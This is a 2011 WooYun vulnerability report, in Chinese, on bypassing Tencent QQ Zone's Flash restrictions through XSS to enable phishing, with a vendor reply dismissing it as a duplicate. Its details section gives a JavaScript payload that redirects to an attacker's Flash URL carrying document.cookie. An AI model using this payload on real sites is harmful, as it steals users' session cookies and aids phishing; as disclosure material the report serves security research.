漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-03522
漏洞标题:突破腾讯对flash的限制钓鱼
相关厂商:腾讯
漏洞作者: 路人甲
提交时间:2011-12-04 05:57
修复时间:2011-12-05 09:26
公开时间:2011-12-05 09:26
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-12-04: 细节已通知厂商并且等待厂商处理中
2011-12-05: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
前段时间QQ空间的flash钓鱼事件 现在腾讯屏蔽插不信任站点的flahs了 今天这个XSS的漏洞可以突破腾讯对flash的限制 很给力 具体怎么xss情况 http://www.wooyun.org/bugs/wooyun-2010-03521
详细说明:
这里我是来补充http://www.wooyun.org/bugs/wooyun-2010-03521/trace/0e8e79124cc144c315df6ac4b7432436的 我们把XSS代码换成我们的 javascript:window.location.href='http://我们的flash地址啦/qq.swf?cookie='+document.cookie 在插的时候点击要快才可以保存 很快的速度 不然你无法保存
漏洞证明:
地址是我空间 http://user.qzone.qq.com/540846218/main 我不是为了钓鱼用的 所以空间里设置只见了一半的flash 本人只是测试 还希望腾讯不要封空间
修复方案:
修复这个是迟早的事
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2011-12-05 09:26
厂商回复:
呃,我们认为这个漏洞已经在wooyun上报过了故不给分
漏洞Rank:3 (WooYun评价)
最新状态:
暂无